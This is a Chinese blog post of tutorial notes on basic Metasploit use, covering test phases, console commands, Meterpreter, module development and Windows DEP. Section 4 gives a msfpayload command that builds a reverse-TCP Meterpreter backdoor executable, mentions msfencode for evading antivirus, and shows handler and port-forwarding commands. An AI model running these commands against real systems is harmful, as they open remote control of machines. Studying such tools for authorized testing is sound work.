metasploit基本用法

最新推荐文章于 2024-06-25 07:04:09 发布
最新推荐文章于 2024-06-25 07:04:09 发布
阅读量2.3k 收藏 5
点赞数 2
分类专栏: metasploit

    1.渗透测试

             metasploit几乎包含了渗透测试所有的工具,涉及渗透测试7个阶段。

        前期交互阶段:与客户讨论并确定渗透测试的范围和目标

        情报搜集阶段:采取各种手段搜集被攻击者的有用信息

        威胁建模阶段:通过搜集的情报信息, 标识目标系统可能存在的安全隐患

        漏洞分析阶段:分析漏洞的可行性以及最可行的攻击方法

        渗透攻击阶段:对目标进行渗透

        后攻击阶段:根据目标的不同, 灵活的应用不同技术. 让目标系统发挥更大的价值

        书写渗透报告阶段:撰写渗透报告

     使用元编程:metaprogramming语言自身作为程序数据输入的编程思想。

                            语言同时也是自身的元语言的能力称之为反射

       2.metasploit基本用法

             banner:查看版本信息

             db_driver:metasploit测试前,需要连接数据库(有的版本自动连接)db_connect

             search:查找相关模块shellcode(search name:**)

             use:使用模块back退出

             show options:查看模块参数设置

             set:设置参数信息或加载PAYLOAD(setg设置后保存)

             exploit:渗透攻击(run别名)

             check:测试target(目标操作系统)设置是否正确

             edit:编辑当前模块

             irb:ruby脚本命令行模式

             jobs:查看控制台上的任务

       3.metasploit攻击方式分类

             635种(exploit)溢出模块、314种(auxiliary)辅助模块、215种(payload)加载模块、27种(encoder免杀处理用)编码、8种(nops)

                          溢出攻击:主动溢出和被动溢出(主动攻击获取权限和监听获取权限)

       4.meterpreter模块

             msfpayload制作后门程序,在远端电脑运行,使用msfencode制作免杀
             msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.101.105 LPORT=444 X>meter.exe
             
             本机msfconsole
                   use exploit/multi/handler
                   set PAYLOAD windows/meterpreter/reverse_tcp
                   set LHOST 0.0.0.0
                   set LPORT 444
                   show options
                   run/exploit    攻击并连接远端后门,进入meterpreter
                   
              基本隧道代理功能 
                   portfwd   -h  (portfwd add -l 2222 -r 10.1.1.129 - p 3389 反弹10.1.1.129端口3389到本地2222并监听)
                   pivot 
              二级代理/三级代理
                   ...
       5.metasploit二次开发

             metasploit所有模块使用ruby编写,msfcli用户接口程序,2015.6.8已被官方团队移除,但仍然可以使用            

             metasploit所有模块继承自msf::Module,模块写好后,重启console在响应的exploit、auxiliary、payload、endcoder、nops目录中可以看到

       6.系统DEP保护        

             系统内存溢出漏洞,根因在于系统代码段和数据段没有明确的划分。DEP保护,阻止数据页执行shellcode代码

                   计算机->系统属性->高级->性能->数据执行保护(windows软件DEP、最下角显示CPU硬件是否支持DEP)

             DEP保护分为:软件DEP即SafeSEH(编译后生成合法的函数地址加以保护,以区分异常数据页函数),硬件DEP(标记NX不可执行区域)

                       SafeSEH和SEH(结构异常处理)不同,SEH需要构建SEH链表指针,以线程为单位。汇编中注册异常回调函数如下:

                            (FS寄存器,存放线程TEB数据)

            VS开发中,DEP保护链接默认开启

                   


本文参考:

metasploit教程:

http://pan.baidu.com/s/1kT3RuL5

相关论坛:

http://bbs.pediy.com(看雪论坛)

http://www.wooyun.org(乌云)

http://blog.sina.com.cn/s/blog_721d9f340100nkw5.html

http://bobao.360.cn/news/detail/1132.html 相关资源整理

https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/ 国外的安全技术网站(介绍meterpreter)

https://www.91ri.org/tag/metasploit

http://www.docin.com/p-499012506.html

http://www.cnblogs.com/dsky/archive/2013/04/26/3044626.html(DEP)

http://www.hx95.com/Article/Ddos/201501/85101.html (meterpreter)

求天下者-积少成多
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
kali中Metasploit基本使用方法
赴前尘
06-26 632
kali中Metasploit基本使用方法
网络安全kali渗透学习 web渗透入门 Metasploit基本使用方法
web18484626332的博客
03-07 2339
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。 这篇文章教大家了解Metasploit基本使用方法 以下有视频版还有文字版 不知道怎么操作的请看文字版的,里面详细的步骤。 关注公众号侠盗男爵回复【kali系统】 视频版↓: 网络安全/kali/黑客/web安全/渗透测
metasploit基本使用方法
鹿鸣天涯
09-13 1901
Msfconsole提供了一个一体化的集中控制台。通过msfconsole,你可以访问和使用所有的metasploit的插件,payload,利用模块,post模块等等。Msfconsole还有第三方程序的接口,比如nmap,sqlmap等,可以直接在msfconsole里面使用。 在启动MSF终端之后,可以首先输入help命令列出MSF终端所支持的命令列表,包括核心命令集和后端数据库命令集。 对于其中的大部分命令,你可以输入help[COMMAND],进一步查看该命令的使用帮助信息。 MSF的六个模
Metasploit 基本使用方法
weixin_43822401的博客
05-16 263
show”命令的有效参数是:all, encoders, nops, exploits, payloads, auxiliary, post,可能允许远程执行代码。作用: Modules affecting this platform 即:列出可以影响此平台的模块,也就是比较好的漏洞。有时候我们会搜索到大量的模块,那么可以用 platform:命令来缩小查询范围。注:大家对比一下上面的截图,发现没有,所有 rank 为 normal 的模块全部都屏蔽了,只剩下几个。大家可以使用上面的参数自行搭配使用。
【工具使用】——Metasploit(MSF)使用详解(超详细)
2401_84254343的博客
06-25 890
show options #查看这个模块需要配置的信息exploitinfo: #查看这个漏洞的信息show payloads #该命令可以查看当前漏洞利用模块下可用的所有Payloadset RHOST 192.168.100.158 #设置RHOST,也就是要攻击主机的ipset LHOST 192.168.100.132 #设置LHOST,也就是我们主机的ip,用于接收从目标机弹回来的shell。
Kali渗透之Metasploit基本使用方法
m0_56988395的博客
02-18 3014
目录 启动 ​ 常用命令 1、核心命令中的connect命令 2、模块相关命令show使用方法 3、模块相关命令search搜索的使用方法 4、模块相关命令use的使用方法 Metaspoit是一个渗透测试平台,能够查找,利用和验证漏洞。 官网:Metasploit | Penetration Testing Software, Pen Testing Security | Metasploit 启动 msfconsole 常用命令 1、核心命令中的connect命令.
Metasploit基本用法
foryouslgme的博客
10-13 4013
【参考博客地址】【启动msf】#msfconsole msf >【搜索模块】msf > search portscan【使用对应模块】msf > use scanner/portscan/syn【查看当前模块的配置参数】msf auxiliary(hashcollision_dos) > show options Module options (auxiliary/dos/http/hashco
Metasploit 基本使用
qq_44237206的博客
05-16 272
Metasploit程序需要使用Postgresql数据库。 PostgresqI概述: PostgreSQL是一种特性非常齐全的自由软件的对象-关系型数据库管理系统(ORDBMS),是以加州大学计算机系开发的POSTGRES 4.2 版本为基础的对象关系型数据库管理系统。 官网:https://www.postgresql.org/ 注:PostgreSQL:世界上最先进的开源关系数据库 扩展:PostgreSQL和 MySQL数据的应用场景区别: 从应用场景来说,PostgreSQL更加适合严格的..
Metasploit基本使用
qq_68233961的博客
11-05 683
Metasploit基本使用
Metasploit基本命令-search命令使用
weixin_44257023的博客
01-31 4001
search命令是Metasploit框架中常用的命令,在日常使用中非常快速的查找模块或者漏洞 search 命令不区分大小写 查看 search 命令参数: search –h 直接搜索: 搜索结果名词解释: Rank排名 由高到低,越高代表可靠性越高,反而可靠性越低 例如: 搜索 mysql 相关模块或者漏洞 search mysql 搜索linux 系统相关模块或者漏洞 search linux 路径查找 忘记了具体的路径,但记得一部分路径,可以使用path这个关键字搜索 例如: searc
Metasploit渗透测试指南_渗透测试_metasploit_
10-04
本指南将深入探讨Metasploit的使用方法,帮助读者理解如何有效地进行渗透测试。 Metasploit框架是一个综合的渗透测试平台,它提供了大量的模块,包括漏洞利用、扫描、后渗透工具等。这些模块使得安全专家能够快速地...
Metasploit渗透测试指南 修订版
09-21
其次,书中深入解析了Metasploit基本结构和组件,如数据库管理、模块系统和命令行界面。通过学习这些基础知识,读者可以理解如何查找和选择合适的exploits和payloads,以及如何自定义它们以适应特定的目标环境。 ...
Metasploit
06-18
- 使用Metasploit提供的post-exploitation模块或自定义脚本来提升权限,以便进行更深入的探索或数据收集。 #### 四、案例分析 以文中提到的例子来看,通过Nmap扫描发现目标主机运行的是Windows XP SP2/SP3或...
Metasploit中文使用教程
04-18
本文将详细介绍 Metasploit 的使用方法和相关知识点。 一、Metasploit 的安装和基本使用 Metasploit 的安装非常简单,只需要下载安装程序并双击安装即可。安装完成后,可以看到安装目录下多了很多文件,其中主要的...
metasploit的使用
11-05
- **metasploit_he_pentration_tester's_guide.pdf**: 可能是Metasploit渗透测试者的指南,涵盖从基础到进阶的Metasploit使用方法。 - **Packtpub.Metasploit.Penetration.Testing.Cookbook.Jun.2012.pdf**: 这本...
mpu6050陀螺仪使用方法开发教程文档.docx
最新发布
07-30
mpu6050陀螺仪使用方法
【SCI顶级】龙格库塔算法RUN-CNN-LSTM-Multihead-Attention温度预测【含源码 5747期】.zip
07-30
CSDN海神之光上传的全部代码均可运行,亲测可用,直接替换数据即可,适合小白; 1、代码压缩包内容 主函数:Main .m; 数据; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,可私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开除Main.m的其他m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博主博客文章底部QQ名片; 4.1 CSDN博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 智能优化算法-CNN-LSTM-Mutilhead-Attention回归预测系列程序定制或科研合作方向: 4.4.1 遗传算法GA/蚁群算法ACO-CNN-LSTM-Mutilhead-Attention回归预测 4.4.2 粒子群算法PSO/蛙跳算法SFLA-CNN-LSTM-Mutilhead-Attention回归预测 4.4.3 灰狼算法GWO/狼群算法WPA-CNN-LSTM-Mutilhead-Attention回归预测 4.4.4 鲸鱼算法WOA/麻雀算法SSA-CNN-LSTM-Mutilhead-Attention回归预测 4.4.5 萤火虫算法FA/差分算法DE-CNN-LSTM-Mutilhead-Attention回归预测
大模型的数学之魂:统计学习理论精要
07-30
大型机器学习模型,通常简称为“大模型”,是指具有数十亿甚至数千亿参数的深度神经网络模型。这些模型因为其庞大的参数量和复杂的计算结构,能够处理非常复杂的任务和数据,展现出强大的表达能力和预测性能。大模型在自然语言处理、计算机视觉、语音识别和推荐系统等多个领域都有广泛的应用。 大模型的设计目的是通过训练海量数据来学习复杂的模式和特征,从而具备强大的泛化能力,能够对未见过的数据做出准确的预测。与参数较少、层数较浅的小模型相比,大模型虽然需要更多的计算资源和时间来训练和推理,但它们展现出了一种被称为“涌现能力”的特性,即从原始训练数据中自动学习并发现新的、更高层次的特征和模式。 大模型的发展历程可以分为几个阶段,从早期的卷积神经网络模型发展到以Transformer为代表的全新神经网络模型,再到当前以GPT为代表的预训练大模型阶段。Transformer架构因其自注意力机制而成为大模型的核心技术,它使得模型能够更好地理解和处理文本数据中的长距离依赖关系。 大模型的分类主要包括语言大模型(NLP)、视觉大模型(CV)和多模态大模型。语言大模型专注于处理文本数据和理解自然语言,而视觉大模型用
Metasploit 渗透测试框架的基本使用
05-26
Metasploit 是一个常用的渗透测试框架,它可以帮助安全研究人员和渗透测试人员识别和利用漏洞,以便在测试过程中评估网络和系统的安全性。以下是 Metasploit 渗透测试框架的基本使用方法: 1. 安装 MetasploitMetasploit 可以在 Windows、Linux 和 Mac OS X 等操作系统上运行。你可以从 Metasploit 的官方网站下载并安装它。 2. 启动 Metasploit:在命令行界面中输入 msfconsole 命令启动 Metasploit。 3. 搜索漏洞:在 Metasploit 中,你可以使用 search 命令来搜索漏洞。例如,如果你想搜索所有与 Apache 相关的漏洞,可以输入以下命令: search apache 4. 选择漏洞:通过搜索漏洞,你可以找到感兴趣的漏洞,并且可以使用 use 命令来选择一个要利用的漏洞。例如,如果你想选择 Apache Struts2 远程代码执行漏洞,可以输入以下命令: use exploit/multi/http/struts2_content_type_ognl 5. 配置选项:在选择漏洞后,你需要配置一些选项,例如目标 IP 地址和端口号、攻击载荷等。可以使用 show options 命令来查看所有可用选项,并使用 set 命令来配置选项。例如,如果你想设置目标 IP 地址为 192.168.1.100,可以输入以下命令: set RHOST 192.168.1.100 6. 运行攻击:在配置选项后,你可以使用 exploit 命令来运行攻击。Metasploit 将自动启动攻击载荷,并尝试利用漏洞。例如,如果你想运行 Apache Struts2 远程代码执行漏洞攻击,可以输入以下命令: exploit 7. 获取访问权限:如果攻击成功,Metasploit 将尝试获取访问权限。在访问权限获取之后,你可以使用 shell 命令来访问目标系统的命令行界面。例如,如果你想访问目标系统的 shell,可以输入以下命令: shell 上述是 Metasploit 渗透测试框架的基本使用方法,但请注意,在进行渗透测试时,请确保获得了所有必要的授权和许可,以避免违反法律和伦理规定。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值